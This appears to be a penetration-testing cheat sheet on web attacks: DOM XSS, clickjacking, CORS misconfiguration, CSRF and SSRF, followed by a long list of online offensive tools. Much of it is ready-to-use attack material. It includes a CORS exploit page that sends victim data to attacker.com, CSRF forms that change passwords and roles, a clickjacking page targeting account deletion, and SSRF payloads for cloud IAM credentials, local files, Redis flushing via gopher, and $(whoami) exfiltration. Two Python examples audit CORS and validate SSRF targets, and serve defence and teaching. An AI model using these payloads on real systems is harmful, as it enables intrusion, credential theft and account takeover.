- DOM-based Open Redirect
- Client-side SQL Injection
- WebSocket-URL Poisoning
# Sources (attacker-controlled input)
document.URL
document.documentURI
document.baseURI
location.href
location.search
location.hash
# Sinks (dangerous functions)
eval()
setTimeout()
setInterval()
document.write()
element.innerHTML
// Vulnerable code
var search = location.search.substring(1);
document.write(search);
// Attack
https://target.com/page?search=<script>alert(1)</script>
# Detection
# Analyze JavaScript source code
# Trace data flow from source to sink
# Test with payloads
# DOM Invader (Burp Suite extension)
# DOMPurify - Testing sanitization
# Manual code review
Description: A UI redressing attack that tricks users into clicking hidden elements.
A transparent iframe is overlaid on top of a legitimate website to steal the user's clicks.
<!DOCTYPE html>
<html>
<head>
<title>Clickjacking Demo</title>
<style>
iframe {
position: absolute;
width: 500px;
height: 500px;
opacity: 0.0001;
z-index: 2;
}
button {
position: absolute;
top: 100px;
left: 100px;
z-index: 1;
}
</style>
</head>
<body>
<button>Click for FREE iPhone!</button>
<iframe src="https://target.com/delete-account"></iframe>
</body>
</html>
# Multistep clickjacking
# Drag & drop clickjacking
# Touch-based clickjacking (mobile)
# Likejacking (Facebook)
<iframe src="https://facebook.com/like-page"></iframe>
# Check for headers
X-Frame-Options: DENY
X-Frame-Options: SAMEORIGIN
Content-Security-Policy: frame-ancestors 'none'
# Double iframe
# Sandbox attribute manipulation
# Browser-specific bypasses
Description: Cross-Origin Resource Sharing misconfigurations that allow unauthorized cross-origin requests.
# Reflect Origin
Access-Control-Allow-Origin: [reflected from Origin header]
Access-Control-Allow-Credentials: true
# Null origin
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true
# Wildcard with credentials (not allowed but some implement wrong)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
# Subdomain wildcards
Access-Control-Allow-Origin: *.target.com   # browsers do not match patterns in this header; the real bug is server logic that reflects any origin ending in .target.com
# Test with different origins
curl -H "Origin: https://evil.com" https://target.com/api/data
# Check response headers
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true
<!-- Attacker page: evil.com -->
<script>
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == 4) {
fetch('https://attacker.com/?data=' + xhr.responseText);
}
}
xhr.open('GET', 'https://target.com/api/sensitive-data', true);
xhr.withCredentials = true;
xhr.send();
</script>
<iframe sandbox="allow-scripts" src="data:text/html,
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://target.com/api/data', true);
xhr.withCredentials = true;
xhr.onload = function() {
parent.postMessage(xhr.responseText, '*');
};
xhr.send();
</script>"></iframe>
1. Reflecting arbitrary origins
2. Accepting null origin
3. Weak regex validation (evil-target.com)
4. Insecure subdomain wildcards
5. Unanchored pattern (a check that the origin ends in target.com also matches eviltarget.com)
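The five misconfigurations above reproduced as server-side origin policies, with the check a tester applies to each probe response (the equivalent of the `curl -H "Origin: ..."` request above and reading the two headers back). This is an added example, not code from the original page; the allowlist and the probe origins are constructed assumptions.

```python
import re

ALLOWLIST = {"https://target.com", "https://app.target.com"}   # assumed legitimate origins

# Origins a tester sends, one request each (the curl -H "Origin: ..." probe above)
PROBES = ["https://target.com", "https://evil.com", "null", "https://eviltarget.com",
          "https://target.com.evil.com", "https://evil.target.com"]


# Server-side origin policies, each one of the mistakes listed in this section
def policy_reflect(origin):            # 1. reflects whatever arrives
    return origin

def policy_null(origin):               # 2. trusts 'null' (sandboxed iframes, file://, redirects)
    return origin if origin in ALLOWLIST or origin == "null" else None

def policy_unanchored_regex(origin):   # 3./5. 'target.com$' also matches eviltarget.com and any subdomain
    return origin if re.search(r"target\.com$", origin) else None

def policy_prefix(origin):             # 4. startswith check: target.com.evil.com passes
    return origin if origin.startswith("https://target.com") else None

def policy_strict(origin):             # exact allowlist match
    return origin if origin in ALLOWLIST else None


def respond(policy, origin):
    """Headers the server sends for this Origin (credentials enabled, as in the examples above)."""
    allowed = policy(origin)
    if allowed is None:
        return {}
    return {"Access-Control-Allow-Origin": allowed, "Access-Control-Allow-Credentials": "true"}


def classify(origin_sent, headers):
    """The tester's check on one response: does ACAO grant an origin we do not trust?"""
    acao = headers.get("Access-Control-Allow-Origin")
    creds = headers.get("Access-Control-Allow-Credentials", "").lower() == "true"
    if acao is None or acao in ALLOWLIST:
        return None
    if acao == "*":
        # browsers refuse '*' together with credentials, so it only matters without them
        return None if creds else "wildcard: any site can read unauthenticated responses"
    if acao == origin_sent:
        kind = "null origin trusted" if origin_sent == "null" else f"untrusted origin reflected: {origin_sent}"
        return kind + (" (with credentials)" if creds else "")
    return None


def audit(policy):
    """Probe -> finding, for every probe that yields one."""
    findings = {}
    for origin in PROBES:
        finding = classify(origin, respond(policy, origin))
        if finding:
            findings[origin] = finding
    return findings


if __name__ == "__main__":
    for policy in (policy_reflect, policy_null, policy_unanchored_regex, policy_prefix, policy_strict):
        print(f"{policy.__name__:24} -> {list(audit(policy))}")
```

Only the exact-match allowlist passes every probe. The subdomain case is worth reporting even when the organisation owns every subdomain: one XSS or takeover anywhere under target.com then reads authenticated API responses cross-origin.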
Description: Cross-Site Request Forgery, an attack that forces an authenticated user to perform unwanted actions.
- Relevant action (change password, transfer money)
- Cookie-based authentication
- No unpredictable parameters
- No CSRF protection
<!-- GET-based CSRF -->
<img src="https://target.com/change-email?email=attacker@evil.com">
<!-- POST-based CSRF -->
<form action="https://target.com/change-password" method="POST">
<input type="hidden" name="new_password" value="hacked123">
<input type="submit" value="Click here">
</form>
<script>
document.forms[0].submit();
</script>
<form action="https://target.com/api/update" method="POST" enctype="text/plain">
<input name='{"email":"attacker@evil.com","role":"admin","ignore":"' value='"}' type='hidden'>
</form>
<script>
document.forms[0].submit();
</script>
// Legacy Flash/ActionScript: crossdomain.xml allows custom headers
URLRequest req = new URLRequest("https://target.com/api");
req.method = "POST";
req.requestHeaders.push(new URLRequestHeader("X-CSRF-Token", "stolen-token"));
# Missing token validation
# Token not tied to user session
# Token in cookie instead of header
# Accepting GET for state-changing actions
# Weak token generation
# Clickjacking + CSRF combo
[ ] Remove CSRF token parameter
[ ] Use another user's CSRF token
[ ] Change request method (POST → GET)
[ ] Remove token from request entirely
[ ] Test with blank token value
[ ] Use same token twice
[ ] Test with different Content-Type
Description: Server-Side Request Forgery, which lets an attacker make requests from the server to internal or external resources.
url=
uri=
path=
dest=
redirect=
next=
data=
reference=
site=
html=
# Access internal services
http://localhost
http://127.0.0.1
http://0.0.0.0
http://[::1]
# Internal IP ranges
http://192.168.1.1
http://10.0.0.1
http://172.16.0.1
# Cloud metadata
http://169.254.169.254/latest/meta-data/
http://metadata.google.internal/computeMetadata/v1/   # GCP also requires the request header Metadata-Flavor: Google
# Get IAM credentials (AWS IMDSv1; IMDSv2 first needs a PUT to /latest/api/token and the returned token in a header, which most SSRF primitives cannot send)
http://169.254.169.254/latest/meta-data/iam/security-credentials/
http://169.254.169.254/latest/meta-data/iam/security-credentials/[role-name]
# Get user data
http://169.254.169.254/latest/user-data/
# IP encoding
http://2130706433 (decimal)
http://0x7f000001 (hex)
http://0177.0.0.1 (octal)
# DNS rebinding
http://ssrf.localdomain (resolves to 127.0.0.1)
# URL bypass
http://127.1
http://localhost.evil.com
http://evil.com#@target.com
http://target.com@evil.com
# Protocol smuggling
dict://localhost:11211/stats
gopher://localhost:6379/_SET%20KEY%20VALUE
file:///etc/passwd
# Redirect bypass
http://evil.com/redirect-to-localhost
# Time-based detection
http://internal-service (slow response)
# Out-of-band detection
http://burpcollaborator.net
http://attacker.com/$(whoami)
# DNS exfiltration
http://$(whoami).attacker.com
# Read local files
file:///etc/passwd
file:///c:/windows/win.ini
# Port scanning
http://internal-network:22
http://internal-network:80
http://internal-network:443
# Protocol smuggling
gopher://127.0.0.1:6379/_*1%0d%0a$8%0d%0aflushall%0d%0a
dict://127.0.0.1:11211/stats
- Access internal services
- Cloud metadata theft
- Read local files
- Port scanning internal network
- RCE via protocol smuggling
- Bypass firewall restrictions
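The IP-encoding and URL bypasses above run against a substring blocklist and against a check that pins the scheme, parses the URL, normalises the host the way the OS does, and then classifies the address. This is an added example, not code from the original page; the sample URLs are constructed, and DNS resolution is deliberately left out so it runs offline (the comment in `hardened_blocked` says what a live implementation must add).

```python
import ipaddress
import socket
from urllib.parse import urlparse


def naive_blocked(url):
    """Substring blocklist on the raw URL: the encodings in this section walk past it."""
    return any(bad in url for bad in ("localhost", "127.0.0.1", "169.254.169.254", "10.", "192.168."))


def parse_ip(host):
    """Resolve an IP literal the way the OS does. socket.inet_aton accepts the
    decimal (2130706433), hex (0x7f000001), octal (0177.0.0.1) and short
    (127.1) forms that ipaddress.ip_address rejects. Returns None for names."""
    if ":" in host:                                   # IPv6 literal
        try:
            return ipaddress.ip_address(host)
        except ValueError:
            return None
    try:
        return ipaddress.ip_address(socket.inet_ntoa(socket.inet_aton(host)))
    except OSError:
        return None


def hardened_blocked(url):
    """Pin the scheme, parse the host, normalise it, then check the address class."""
    p = urlparse(url)
    if p.scheme not in ("http", "https"):             # file://, gopher://, dict:// ...
        return True
    host = p.hostname                                 # urlparse strips userinfo (user@) and [ ]
    if host is None or host == "localhost" or host.endswith(".localhost"):
        return True
    ip = parse_ip(host)
    if ip is None:
        # A real hostname: resolve it, apply the test below to EVERY returned
        # address, and connect to that exact address (otherwise DNS rebinding
        # wins). Omitted here so the example runs offline.
        return False
    return ip.is_private or ip.is_loopback or ip.is_link_local or ip.is_reserved or ip.is_unspecified


# Constructed sample: payloads from this section plus one legitimate URL
SAMPLE = [
    "https://target.com/api/status",
    "http://127.0.0.1/admin",
    "http://2130706433/",
    "http://0x7f000001/",
    "http://0177.0.0.1/",
    "http://127.1/",
    "http://[::1]/",
    "http://0.0.0.0/",
    "http://169.254.169.254/latest/meta-data/",
    "http://target.com@127.0.0.1/",
    "file:///etc/passwd",
    "gopher://127.0.0.1:6379/_FLUSHALL",
]


def naive_bypasses():
    """URLs the hardened check blocks that the blocklist lets through."""
    return [u for u in SAMPLE if hardened_blocked(u) and not naive_blocked(u)]


if __name__ == "__main__":
    for u in SAMPLE:
        print(f"{u:45} naive={naive_blocked(u)!s:5} hardened={hardened_blocked(u)}")
```

Even the hardened check is only half of the fix: the address class test has to be applied after DNS resolution, to the address actually connected to, and again after every redirect, otherwise the "redirect bypass" and DNS rebinding entries above still work.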
Description: A collection of online tools and websites useful for penetration testing.
# DNS & Domain
- dnsdumpster.com - DNS recon & mapping
- securitytrails.com - DNS history & WHOIS
- viewdns.info - Multiple DNS tools
- crt.sh - Certificate transparency
# Search Engines
- shodan.io - IoT & service search
- censys.io - Internet-wide scanning
- zoomeye.org - Cyberspace search
- fofa.so - Asset search
# OSINT
- hunter.io - Email finder
- phonebook.cz - OSINT tool
- intelx.io - Intelligence search
- dehashed.com - Breach data
# Subdomain Discovery
- subdomainfinder.c99.nl
- pentest-tools.com/information-gathering/find-subdomains-of-domain
- spyse.com
- riddler.io
# Wayback Machine
- web.archive.org
- archive.is
- urlscan.io
# Web Scanners
- pentest-tools.com
- hackertarget.com
- intruder.io
- detectify.com
# SSL/TLS Testing
- ssllabs.com/ssltest
- testssl.sh (online version)
- htbridge.com/ssl
# Security Headers
- securityheaders.com
- observatory.mozilla.org
# General
- cyberchef.org - Swiss army knife
- base64decode.org
- urldecoder.org
- hashkiller.io
# JWT
- jwt.io - JWT decoder
- token.dev - JWT debugger
# Hash Analysis
- crackstation.net
- hashes.com
- cmd5.org
# XSS
- xsshunter.com - Blind XSS
- xss.js.org - XSS payloads
- portswigger.net/web-security/cross-site-scripting/cheat-sheet
# SQL Injection
- sqlmap.org
- portswigger.net/web-security/sql-injection/cheat-sheet
# Command Injection
- revshells.com - Reverse shell generator
- reverse-shell.sh - Shell commands
# Request Inspection
- webhook.site - Instant URLs
- requestbin.com
- beeceptor.com
- pipedream.com
# Burp Collaborator Alternatives
- interact.sh
- burpcollaborator.net
- canarytokens.org
# File Sharing
- file.io - Temporary file sharing
- transfer.sh
- tmpfiles.org
# Vulnerability DBs
- exploit-db.com
- cvedetails.com
- nvd.nist.gov
- vuldb.com
# Exploit Search
- sploitus.com
- packetstormsecurity.com
- rapid7.com/db
# REST API
- reqbin.com - API tester
- hoppscotch.io - API client
- apitester.com
# GraphQL
- graphql-playground.com
- altair.sirmuel.design
# Hash Identification
- tunnelsup.com/hash-analyzer
- onlinehashcrack.com
# Encryption/Decryption
- cryptii.com
- dcode.fr
- quipqiup.com (cipher solver)
# Deobfuscation
- beautifier.io - JavaScript beautifier
- jsnice.org - JS deobfuscator
- deobfuscate.io
# Decompilers
- dogbolt.org - Multi-decompiler
- decompiler.com
# Android
- apkpure.com - APK downloads
- apkcombo.com
- apkmirror.com
# Analysis
- virustotal.com
- hybrid-analysis.com
- any.run
# Port Scanning
- hackertarget.com/nmap-online-port-scanner
- pentest-tools.com/network-vulnerability-scanning/tcp-port-scanner-online-nmap
# Whois
- whois.domaintools.com
- who.is
- lookup.icann.org
# Wordlist Collections
- github.com/danielmiessler/SecLists
- wordlists.assetnote.io
- github.com/fuzz-security
# Password Lists
- weakpass.com
- crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
# Templates
- pentestreports.com
- github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report
- offensive-security.com/reports/sample-penetration-testing-report.pdf
# Screenshot Tools
- prnt.sc
- lightshot.com
- flameshot.org (desktop)
# Training Platforms
- portswigger.net/web-security
- hackerone.com/hacktivity
- bugcrowd.com/resources
- pentesterlab.com
# Practice Labs
- hackthebox.eu
- tryhackme.com
- pentesterlab.com
- overthewire.org
# Essential Extensions
- Wappalyzer - Technology detection
- Cookie-Editor - Cookie manipulation
- User-Agent Switcher
- FoxyProxy - Proxy management
- Hack-Tools - Pentest toolkit
# API Security
- apisecurity.io
- owasp.org/www-project-api-security
# Pipeline Integration
- snyk.io
- dependabot.com
- sonarqube.org
# Bug Bounty Platforms
- HackerOne - hackerone.com
- Bugcrowd - bugcrowd.com
- Intigriti - intigriti.com
- YesWeHack - yeswehack.com
- Synack - synack.com
# Community
- Twitter #bugbounty #bugbountytips
- Reddit r/bugbounty r/netsec
- Discord servers (Nahamsec, etc.)
- YouTube channels (STÖK, InsiderPhD, Nahamsec)
# Standards & Methodologies
- OWASP Testing Guide
- OWASP Top 10
- PTES (Penetration Testing Execution Standard)
- NIST Guidelines
Feel free to contribute to this GitBook by:
- Submitting pull requests
- Reporting issues
- Suggesting new techniques
- Sharing real-world examples
Usage of all tools/scripts on this site for attacking targets without prior mutual consent is illegal.
It is the end user's responsibility to obey all applicable local, state and federal laws.
I assume no liability and am not responsible for any misuse or damage caused by this site. The resources I have used are too many to count and I am grateful and proud to be part of a community where knowledge is not hoarded but shared for the common good.
"If I have seen further it is by standing on the shoulders of Giants"
This documentation is provided for educational purposes only. Always ensure you have proper authorization before testing any systems.
Last Updated: 2025
Maintained by: [Your Name/Team]
Version: 1.0